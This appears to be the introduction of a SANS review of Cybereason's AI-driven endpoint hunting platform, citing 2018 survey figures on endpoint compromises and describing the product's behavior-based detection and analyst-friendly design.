The threat landscape becomes more daunting by the day. Increasingly sophisticated attacks are being spotted in the wild, and security teams are scrambling to keep up with attacks targeting end users. More than ever, the attacks targeting our endpoints and servers alike are stealthier, harder to detect with traditional tools and more likely to focus on persistence and longer term damage.
In the 2018 SANS “Endpoint Protection and Response” survey, 42 percent of respondents indicated that at least one of their endpoints had been compromised in the previous 12 months, primarily through browser exploits and social engineering. Sixteen percent of those who experienced a compromise noted that they discovered it via third-party notification, which suggests that many endpoint security tools and tactics in use today are inadequate and we really need better prevention and detection tools right now. Almost 60 percent of respondents also indicated that they would like to see artificial intelligence (AI) and machine learning capabilities implemented in their endpoint protection tools but don’t currently have them.
The previous generation of signature-based detection tools is failing us. Many attacks don’t leverage malware at all: Attackers are using memory-resident techniques, compromised credentials and built-in system tools such as PowerShell to avoid detection by many of the traditional endpoint security platforms. Many endpoint tools also consume significant system resources.
SANS had the opportunity to review Cybereason’s AI hunting platform, which offers a lightweight, more behavior-focused model of host-based protection that can help intrusion analysis and investigations teams more rapidly and efficiently prevent, detect and analyze malicious behavior in their environments. The company recognizes that most enterprises are lacking analytics experts and don’t have enough time to train tier 1 analysts on the job, so one of the primary goals of the platform is to help overcome today’s security skills gap. By emphasizing ease of use, built-in intelligence
and search tools, rapid event triage, and highly capable hunting methods, Cybereason is a capable, intelligence-driven system that many security operations center (SOC) teams could leverage immediately to prevent or analyze attacks more quickly. Our review environment was set up with real exploits and malware in a testbed operated by Cybereason, and we fully analyzed numerous examples of the product in action.